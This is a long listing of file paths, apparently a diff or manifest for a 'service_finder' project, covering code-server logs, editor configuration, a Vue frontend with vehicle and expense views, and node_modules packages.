+/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/remoteTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/ptyhost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T174543/remoteagent.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/remoteTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/ptyhost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260126T164451/remoteagent.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.css-language-features +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.css-language-features/CSS Language Server.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.typescript-language-features +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.typescript-language-features/TypeScript.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.html-language-features +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.html-language-features/HTML Language Server.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/remoteTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/ptyhost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T214520/remoteagent.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.html-language-features +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.html-language-features/HTML Language Server.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/remoteTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/ptyhost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T001948/remoteagent.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/remoteTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/ptyhost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260129T213246/remoteagent.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/remoteTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/ptyhost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8 +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.git +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.git/Git.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github/GitHub.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/remoteExtHostTelemetry.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github-authentication +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github-authentication/GitHub Authentication.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/remoteexthost.log +/opt/service_finder/.vscode_config/.local/share/code-server/logs/20260125T233505/remoteagent.log +/opt/service_finder/.vscode_config/.local/share/code-server/machineid +/opt/service_finder/.vscode_config/.local/share/code-server/coder.json +/opt/service_finder/.vscode_config/.local/share/mc +/opt/service_finder/.vscode_config/.local/share/mc/history +/opt/service_finder/.vscode_config/.ssh +/opt/service_finder/.vscode_config/.bashrc +/opt/service_finder/.vscode_config/.config +/opt/service_finder/.vscode_config/.config/code-server +/opt/service_finder/.vscode_config/.config/code-server/config.yaml +/opt/service_finder/.vscode_config/.config/mc +/opt/service_finder/.vscode_config/.config/mc/ini +/opt/service_finder/.vscode_config/.config/mc/panels.ini +/opt/service_finder/.vscode_config/.bash_history +/opt/service_finder/.vscode_config/.cache +/opt/service_finder/.vscode_config/.cache/typescript +/opt/service_finder/.vscode_config/.cache/typescript/5.9 +/opt/service_finder/.vscode_config/.cache/typescript/5.9/package.json +/opt/service_finder/.vscode_config/.cache/Microsoft +/opt/service_finder/.vscode_config/.cache/Microsoft/DeveloperTools +/opt/service_finder/.vscode_config/.cache/Microsoft/DeveloperTools/deviceid +/opt/service_finder/.vscode_config/.cache/mc +/opt/service_finder/.vscode_config/.cache/mc/Tree +/opt/service_finder/logs +/opt/service_finder/frontend +/opt/service_finder/frontend/tailwind.config.js +/opt/service_finder/frontend/src +/opt/service_finder/frontend/src/App.vue +/opt/service_finder/frontend/src/views +/opt/service_finder/frontend/src/views/AddVehicle.vue +/opt/service_finder/frontend/src/views/AddExpense.vue +/opt/service_finder/frontend/src/views/Dashboard.vue +/opt/service_finder/frontend/src/views/admin +/opt/service_finder/frontend/src/views/admin/AdminStats.vue +/opt/service_finder/frontend/src/views/Expenses.vue +/opt/service_finder/frontend/src/views/ResetPassword.vue +/opt/service_finder/frontend/src/views/Register.vue +/opt/service_finder/frontend/src/views/Login.vue +/opt/service_finder/frontend/src/views/ForgotPassword.vue +/opt/service_finder/frontend/src/assets +/opt/service_finder/frontend/src/assets/vue.svg +/opt/service_finder/frontend/src/router +/opt/service_finder/frontend/src/router/index.js +/opt/service_finder/frontend/src/main.js +/opt/service_finder/frontend/src/stores +/opt/service_finder/frontend/src/services +/opt/service_finder/frontend/src/components +/opt/service_finder/frontend/src/components/HelloWorld.vue +/opt/service_finder/frontend/src/style.css +/opt/service_finder/frontend/postcss.config.js +/opt/service_finder/frontend/package.json +/opt/service_finder/frontend/.gitignore +/opt/service_finder/frontend/package-lock.json +/opt/service_finder/frontend/public +/opt/service_finder/frontend/public/vite.svg +/opt/service_finder/frontend/vite.config.js +/opt/service_finder/frontend/index.html +/opt/service_finder/frontend/node_modules +/opt/service_finder/frontend/node_modules/detect-libc +/opt/service_finder/frontend/node_modules/detect-libc/index.d.ts +/opt/service_finder/frontend/node_modules/detect-libc/lib +/opt/service_finder/frontend/node_modules/detect-libc/lib/detect-libc.js +/opt/service_finder/frontend/node_modules/detect-libc/lib/process.js +/opt/service_finder/frontend/node_modules/detect-libc/lib/filesystem.js +/opt/service_finder/frontend/node_modules/detect-libc/lib/elf.js +/opt/service_finder/frontend/node_modules/detect-libc/package.json +/opt/service_finder/frontend/node_modules/detect-libc/LICENSE +/opt/service_finder/frontend/node_modules/detect-libc/README.md +/opt/service_finder/frontend/node_modules/jsesc +/opt/service_finder/frontend/node_modules/jsesc/jsesc.js +/opt/service_finder/frontend/node_modules/jsesc/man +/opt/service_finder/frontend/node_modules/jsesc/man/jsesc.1 +/opt/service_finder/frontend/node_modules/jsesc/LICENSE-MIT.txt +/opt/service_finder/frontend/node_modules/jsesc/package.json +/opt/service_finder/frontend/node_modules/jsesc/bin +/opt/service_finder/frontend/node_modules/jsesc/bin/jsesc +/opt/service_finder/frontend/node_modules/jsesc/README.md +/opt/service_finder/frontend/node_modules/unplugin-utils +/opt/service_finder/frontend/node_modules/unplugin-utils/package.json +/opt/service_finder/frontend/node_modules/unplugin-utils/dist +/opt/service_finder/frontend/node_modules/unplugin-utils/dist/index.d.ts +/opt/service_finder/frontend/node_modules/unplugin-utils/dist/index.js +/opt/service_finder/frontend/node_modules/unplugin-utils/LICENSE +/opt/service_finder/frontend/node_modules/unplugin-utils/README.md +/opt/service_finder/frontend/node_modules/asynckit +/opt/service_finder/frontend/node_modules/asynckit/serial.js +/opt/service_finder/frontend/node_modules/asynckit/lib +/opt/service_finder/frontend/node_modules/asynckit/lib/abort.js +/opt/service_finder/frontend/node_modules/asynckit/lib/readable_parallel.js +/opt/service_finder/frontend/node_modules/asynckit/lib/async.js +/opt/service_finder/frontend/node_modules/asynckit/lib/readable_asynckit.js +/opt/service_finder/frontend/node_modules/asynckit/lib/defer.js +/opt/service_finder/frontend/node_modules/asynckit/lib/terminator.js +/opt/service_finder/frontend/node_modules/asynckit/lib/iterate.js +/opt/service_finder/frontend/node_modules/asynckit/lib/state.js +/opt/service_finder/frontend/node_modules/asynckit/lib/streamify.js +/opt/service_finder/frontend/node_modules/asynckit/lib/readable_serial_ordered.js +/opt/service_finder/frontend/node_modules/asynckit/lib/readable_serial.js +/opt/service_finder/frontend/node_modules/asynckit/package.json +/opt/service_finder/frontend/node_modules/asynckit/bench.js +/opt/service_finder/frontend/node_modules/asynckit/stream.js +/opt/service_finder/frontend/node_modules/asynckit/LICENSE +/opt/service_finder/frontend/node_modules/asynckit/index.js +/opt/service_finder/frontend/node_modules/asynckit/README.md +/opt/service_finder/frontend/node_modules/asynckit/serialOrdered.js +/opt/service_finder/frontend/node_modules/asynckit/parallel.js +/opt/service_finder/frontend/node_modules/@types +/opt/service_finder/frontend/node_modules/@types/estree +/opt/service_finder/frontend/node_modules/@types/estree/index.d.ts +/opt/service_finder/frontend/node_modules/@types/estree/package.json +/opt/service_finder/frontend/node_modules/@types/estree/LICENSE +/opt/service_finder/frontend/node_modules/@types/estree/flow.d.ts +/opt/service_finder/frontend/node_modules/@types/estree/README.md +/opt/service_finder/frontend/node_modules/estree-walker +/opt/service_finder/frontend/node_modules/estree-walker/src +/opt/service_finder/frontend/node_modules/estree-walker/src/package.json +/opt/service_finder/frontend/node_modules/estree-walker/src/async.js +/opt/service_finder/frontend/node_modules/estree-walker/src/sync.js +/opt/service_finder/frontend/node_modules/estree-walker/src/walker.js +/opt/service_finder/frontend/node_modules/estree-walker/src/index.js +/opt/service_finder/frontend/node_modules/estree-walker/types +/opt/service_finder/frontend/node_modules/estree-walker/types/index.d.ts +/opt/service_finder/frontend/node_modules/estree-walker/types/sync.d.ts +/opt/service_finder/frontend/node_modules/estree-walker/types/tsconfig.tsbuildinfo +/opt/service_finder/frontend/node_modules/estree-walker/types/async.d.ts +/opt/service_finder/frontend/node_modules/estree-walker/types/walker.d.ts +/opt/service_finder/frontend/node_modules/estree-walker/package.json +/opt/service_finder/frontend/node_modules/estree-walker/dist +/opt/service_finder/frontend/node_modules/estree-walker/dist/umd +/opt/service_finder/frontend/node_modules/estree-walker/dist/umd/estree-walker.js +/opt/service_finder/frontend/node_modules/estree-walker/dist/esm +/opt/service_finder/frontend/node_modules/estree-walker/dist/esm/estree-walker.js +/opt/service_finder/frontend/node_modules/estree-walker/dist/esm/package.json +/opt/service_finder/frontend/node_modules/estree-walker/LICENSE +/opt/service_finder/frontend/node_modules/estree-walker/README.md +/opt/service_finder/frontend/node_modules/estree-walker/CHANGELOG.md +/opt/service_finder/frontend/node_modules/local-pkg +/opt/service_finder/frontend/node_modules/local-pkg/package.json +/opt/service_finder/frontend/node_modules/local-pkg/dist +/opt/service_finder/frontend/node_modules/local-pkg/dist/index.d.ts +/opt/service_finder/frontend/node_modules/local-pkg/dist/index.cjs +/opt/service_finder/frontend/node_modules/local-pkg/dist/index.d.mts +/opt/service_finder/frontend/node_modules/local-pkg/dist/index.d.cts +/opt/service_finder/frontend/node_modules/local-pkg/dist/index.mjs +/opt/service_finder/frontend/node_modules/local-pkg/LICENSE +/opt/service_finder/frontend/node_modules/local-pkg/README.md +/opt/service_finder/frontend/node_modules/copy-anything +/opt/service_finder/frontend/node_modules/copy-anything/package.json +/opt/service_finder/frontend/node_modules/copy-anything/dist +/opt/service_finder/frontend/node_modules/copy-anything/dist/index.d.ts +/opt/service_finder/frontend/node_modules/copy-anything/dist/index.js +/opt/service_finder/frontend/node_modules/copy-anything/LICENSE +/opt/service_finder/frontend/node_modules/copy-anything/README.md +/opt/service_finder/frontend/node_modules/postcss +/opt/service_finder/frontend/node_modules/postcss/lib +/opt/service_finder/frontend/node_modules/postcss/lib/lazy-result.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/at-rule.js +/opt/service_finder/frontend/node_modules/postcss/lib/stringifier.js +/opt/service_finder/frontend/node_modules/postcss/lib/fromJSON.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/previous-map.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/fromJSON.js +/opt/service_finder/frontend/node_modules/postcss/lib/stringify.js +/opt/service_finder/frontend/node_modules/postcss/lib/tokenize.js +/opt/service_finder/frontend/node_modules/postcss/lib/previous-map.js +/opt/service_finder/frontend/node_modules/postcss/lib/processor.js +/opt/service_finder/frontend/node_modules/postcss/lib/rule.js +/opt/service_finder/frontend/node_modules/postcss/lib/no-work-result.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/stringify.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/container.js +/opt/service_finder/frontend/node_modules/postcss/lib/declaration.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/stringifier.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/terminal-highlight.js +/opt/service_finder/frontend/node_modules/postcss/lib/document.js +/opt/service_finder/frontend/node_modules/postcss/lib/node.js +/opt/service_finder/frontend/node_modules/postcss/lib/result.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/warning.d.ts 